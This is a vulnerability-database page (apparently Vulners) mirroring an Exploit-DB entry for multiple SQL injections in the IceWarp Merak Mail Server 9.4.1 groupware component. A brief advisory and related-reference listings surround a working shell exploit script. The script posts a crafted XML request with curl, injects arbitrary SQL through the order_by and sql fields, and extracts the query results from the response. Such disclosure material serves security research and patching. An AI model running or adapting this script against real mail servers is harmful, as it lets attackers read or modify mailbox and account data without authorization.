Lucene search
+L

IceWarp Merak Mail Server 9.4.1 Groupware Component - Multiple SQL Injections

🗓️ 05 May 2009 00:00:00Reported by RedTeam PentestingType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

IceWarp Merak Mail Server 9.4.1 SQL Injectio

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
IceWarp Merak WebMail Server < 9.4.2 Multiple Vulnerabilities
18 Aug 200400:00
nessus
nessus
Tenable Nessus
IceWarp Merak WebMail Server < 9.4.2 Multiple Vulnerabilities
8 May 200900:00
nessus
circl
Circl
CVE-2009-1468
5 May 200900:00
circl
cve
CVE
CVE-2009-1468
5 May 200920:00
cve
cvelist
Cvelist
CVE-2009-1468
5 May 200920:00
cvelist
euvd
EUVD
EUVD-2009-1466
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-1468
5 May 200920:30
nvd
packetstorm
Packet Storm
IceWarp WebMail SQL Injection
5 May 200900:00
packetstorm
prion
Prion
Sql injection
5 May 200920:30
prion
securityvulns
securityvulns
[RT-SA-2009-003] IceWarp WebMail Server: SQL Injection in Groupware Component
5 May 200900:00
securityvulns
Rows per page
source: https://www.securityfocus.com/bid/34820/info

IceWarp Merak Mail Server is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

IceWarp Merak Mail Server 9.4.1 is affected; other versions may be vulnerable as well.

#!/bin/sh

sid=$1
uid=$2
orderby=$3
if [ -n "$4" ] ; then
    sql=$4
else
    sql="1=0)/*"
fi
curl --silent -d '<iq sid="'$sid'" type="get" format="json">
  <query xmlns="webmail:iq:items">
    <account uid="'$uid'">
      <folder uid="Files">
        <item><values><evntitle></evntitle></values>
          <filter><offset></offset><limit></limit>
            <order_by>'"$orderby"'</order_by>
            <sql>'"$sql"'</sql>
          </filter>
        </item>
      </folder>
    </account>
  </query>
</iq>' https://example.com/webmail/server/webmail.php | \
perl -pe 's/{/\n/g' | grep "result::" | \
sed -e 's/^"VALUE":"result:://' -e 's/"}]}],"ATTRIBUTES":$//'

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Apr 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.5
EPSS0.01925
32